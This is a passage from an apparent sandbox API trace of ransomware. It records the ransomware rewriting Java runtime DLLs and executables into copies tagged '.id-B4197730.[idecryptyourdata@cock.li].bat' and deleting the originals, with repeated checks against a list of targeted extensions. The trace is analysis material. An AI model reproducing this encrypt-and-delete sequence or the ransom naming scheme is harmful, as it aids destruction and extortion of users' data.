lstrlenW (lpString=".jpg") returned 4 [0197.526] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.527] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.527] lstrlenW (lpString="jp2ssv.dll") returned 10 [0197.527] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.527] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=235584) returned 1 [0197.527] CloseHandle (hObject=0x3a8) returned 1 [0197.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll")) returned 0x20 [0197.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.528] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.528] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.528] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.528] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0197.529] GetLastError () returned 0x0 [0197.529] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x39840, lpOverlapped=0x0) returned 1 [0197.575] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x39850, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x39850, lpOverlapped=0x0) returned 1 [0197.578] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.578] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xe8, lpOverlapped=0x0) returned 1 [0197.578] SetEndOfFile (hFile=0x35c) returned 1 [0197.578] CloseHandle (hObject=0x35c) returned 1 [0197.578] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.578] SetEndOfFile (hFile=0x3a8) returned 1 [0197.580] CloseHandle (hObject=0x3a8) returned 1 [0197.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.580] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll")) returned 1 [0197.581] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 49 [0197.581] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 49 [0197.581] lstrlenW (lpString=".doc") returned 4 [0197.581] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.581] lstrlenW (lpString=".docx") returned 5 [0197.581] lstrcmpiW (lpString1=".docx", lpString2="v.dll") returned -1 [0197.581] lstrlenW (lpString=".pdf") returned 4 [0197.581] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.581] lstrlenW (lpString=".xls") returned 4 [0197.581] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.581] lstrlenW (lpString=".xlsx") returned 5 [0197.581] lstrcmpiW (lpString1=".xlsx", lpString2="v.dll") returned -1 [0197.581] lstrlenW (lpString=".ppt") returned 4 [0197.581] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.581] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 49 [0197.581] lstrlenW (lpString=".zip") returned 4 [0197.581] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.581] lstrlenW (lpString=".rar") returned 4 [0197.581] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.581] lstrlenW (lpString=".bz2") returned 4 [0197.581] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.581] lstrlenW (lpString=".7z") returned 3 [0197.581] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.581] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 49 [0197.581] lstrlenW (lpString=".dbf") returned 4 [0197.582] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.582] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 49 [0197.582] lstrlenW (lpString=".1cd") returned 4 [0197.582] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.582] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 49 [0197.582] lstrlenW (lpString=".jpg") returned 4 [0197.582] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.582] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 49 [0197.582] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 49 [0197.582] lstrlenW (lpString=".doc") returned 4 [0197.582] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.582] lstrlenW (lpString=".docx") returned 5 [0197.582] lstrcmpiW (lpString1=".docx", lpString2="v.dll") returned -1 [0197.582] lstrlenW (lpString=".pdf") returned 4 [0197.582] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.582] lstrlenW (lpString=".xls") returned 4 [0197.582] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.582] lstrlenW (lpString=".xlsx") returned 5 [0197.582] lstrcmpiW (lpString1=".xlsx", lpString2="v.dll") returned -1 [0197.582] lstrlenW (lpString=".ppt") returned 4 [0197.582] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.582] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 49 [0197.582] lstrlenW (lpString=".zip") returned 4 [0197.582] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.582] lstrlenW (lpString=".rar") returned 4 [0197.582] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.582] lstrlenW (lpString=".bz2") returned 4 [0197.583] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.583] lstrlenW (lpString=".7z") returned 3 [0197.583] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.583] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 49 [0197.583] lstrlenW (lpString=".dbf") returned 4 [0197.583] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.583] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 49 [0197.583] lstrlenW (lpString=".1cd") returned 4 [0197.583] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.583] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 49 [0197.583] lstrlenW (lpString=".jpg") returned 4 [0197.583] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.583] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.583] lstrlenW (lpString="jsound.dll") returned 10 [0197.583] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.584] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=35392) returned 1 [0197.584] CloseHandle (hObject=0x3a8) returned 1 [0197.584] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll")) returned 0x20 [0197.584] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.584] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.584] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.584] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.584] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0197.585] GetLastError () returned 0x0 [0197.585] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x8a40, lpOverlapped=0x0) returned 1 [0197.663] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x8a50, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x8a50, lpOverlapped=0x0) returned 1 [0197.664] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.664] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xe8, lpOverlapped=0x0) returned 1 [0197.664] SetEndOfFile (hFile=0x35c) returned 1 [0197.664] CloseHandle (hObject=0x35c) returned 1 [0197.664] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.664] SetEndOfFile (hFile=0x3a8) returned 1 [0197.665] CloseHandle (hObject=0x3a8) returned 1 [0197.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.665] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll")) returned 1 [0197.665] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 49 [0197.666] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 49 [0197.666] lstrlenW (lpString=".doc") returned 4 [0197.666] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.666] lstrlenW (lpString=".docx") returned 5 [0197.666] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0197.666] lstrlenW (lpString=".pdf") returned 4 [0197.666] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.666] lstrlenW (lpString=".xls") returned 4 [0197.666] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.666] lstrlenW (lpString=".xlsx") returned 5 [0197.666] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0197.666] lstrlenW (lpString=".ppt") returned 4 [0197.666] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.666] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 49 [0197.666] lstrlenW (lpString=".zip") returned 4 [0197.666] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.666] lstrlenW (lpString=".rar") returned 4 [0197.666] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.666] lstrlenW (lpString=".bz2") returned 4 [0197.666] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.666] lstrlenW (lpString=".7z") returned 3 [0197.666] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.666] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 49 [0197.666] lstrlenW (lpString=".dbf") returned 4 [0197.666] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.676] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 49 [0197.676] lstrlenW (lpString=".1cd") returned 4 [0197.676] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.676] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 49 [0197.676] lstrlenW (lpString=".jpg") returned 4 [0197.676] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.676] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 49 [0197.676] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 49 [0197.677] lstrlenW (lpString=".doc") returned 4 [0197.677] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.677] lstrlenW (lpString=".docx") returned 5 [0197.677] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0197.677] lstrlenW (lpString=".pdf") returned 4 [0197.677] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.677] lstrlenW (lpString=".xls") returned 4 [0197.677] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.677] lstrlenW (lpString=".xlsx") returned 5 [0197.677] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0197.677] lstrlenW (lpString=".ppt") returned 4 [0197.677] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.677] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 49 [0197.677] lstrlenW (lpString=".zip") returned 4 [0197.677] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.677] lstrlenW (lpString=".rar") returned 4 [0197.677] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.677] lstrlenW (lpString=".bz2") returned 4 [0197.677] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.677] lstrlenW (lpString=".7z") returned 3 [0197.677] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.677] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 49 [0197.677] lstrlenW (lpString=".dbf") returned 4 [0197.677] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.677] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 49 [0197.677] lstrlenW (lpString=".1cd") returned 4 [0197.677] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.677] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 49 [0197.677] lstrlenW (lpString=".jpg") returned 4 [0197.677] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.678] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.678] lstrlenW (lpString="kcms.dll") returned 8 [0197.678] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.678] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=220736) returned 1 [0197.678] CloseHandle (hObject=0x3a8) returned 1 [0197.678] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll")) returned 0x20 [0197.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.679] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.679] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.679] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.679] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0197.680] GetLastError () returned 0x0 [0197.680] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x35e40, lpOverlapped=0x0) returned 1 [0197.754] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x35e50, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x35e50, lpOverlapped=0x0) returned 1 [0197.758] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.758] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.759] SetEndOfFile (hFile=0x35c) returned 1 [0197.759] CloseHandle (hObject=0x35c) returned 1 [0197.759] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.759] SetEndOfFile (hFile=0x3a8) returned 1 [0197.762] CloseHandle (hObject=0x3a8) returned 1 [0197.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.762] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll")) returned 1 [0197.762] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 47 [0197.762] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 47 [0197.762] lstrlenW (lpString=".doc") returned 4 [0197.762] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.762] lstrlenW (lpString=".docx") returned 5 [0197.764] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.764] lstrlenW (lpString=".pdf") returned 4 [0197.764] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.764] lstrlenW (lpString=".xls") returned 4 [0197.764] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.765] lstrlenW (lpString=".xlsx") returned 5 [0197.765] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.765] lstrlenW (lpString=".ppt") returned 4 [0197.765] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.765] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 47 [0197.765] lstrlenW (lpString=".zip") returned 4 [0197.765] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.765] lstrlenW (lpString=".rar") returned 4 [0197.765] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.765] lstrlenW (lpString=".bz2") returned 4 [0197.765] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.765] lstrlenW (lpString=".7z") returned 3 [0197.765] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.765] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 47 [0197.765] lstrlenW (lpString=".dbf") returned 4 [0197.765] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.765] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 47 [0197.765] lstrlenW (lpString=".1cd") returned 4 [0197.765] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.765] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 47 [0197.765] lstrlenW (lpString=".jpg") returned 4 [0197.765] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.765] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 47 [0197.765] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 47 [0197.765] lstrlenW (lpString=".doc") returned 4 [0197.765] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.765] lstrlenW (lpString=".docx") returned 5 [0197.765] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.765] lstrlenW (lpString=".pdf") returned 4 [0197.765] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.766] lstrlenW (lpString=".xls") returned 4 [0197.766] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.766] lstrlenW (lpString=".xlsx") returned 5 [0197.766] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.766] lstrlenW (lpString=".ppt") returned 4 [0197.766] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.766] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 47 [0197.766] lstrlenW (lpString=".zip") returned 4 [0197.766] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.766] lstrlenW (lpString=".rar") returned 4 [0197.766] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.766] lstrlenW (lpString=".bz2") returned 4 [0197.766] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.766] lstrlenW (lpString=".7z") returned 3 [0197.766] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.766] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 47 [0197.766] lstrlenW (lpString=".dbf") returned 4 [0197.766] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.766] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 47 [0197.766] lstrlenW (lpString=".1cd") returned 4 [0197.766] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.766] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll") returned 47 [0197.766] lstrlenW (lpString=".jpg") returned 4 [0197.766] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.766] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0197.767] lstrlenW (lpString="keytool.exe") returned 11 [0197.767] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.767] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=16448) returned 1 [0197.767] CloseHandle (hObject=0x3a8) returned 1 [0197.767] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe")) returned 0x20 [0197.767] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.767] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.768] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.768] SetFilePointerEx (in: 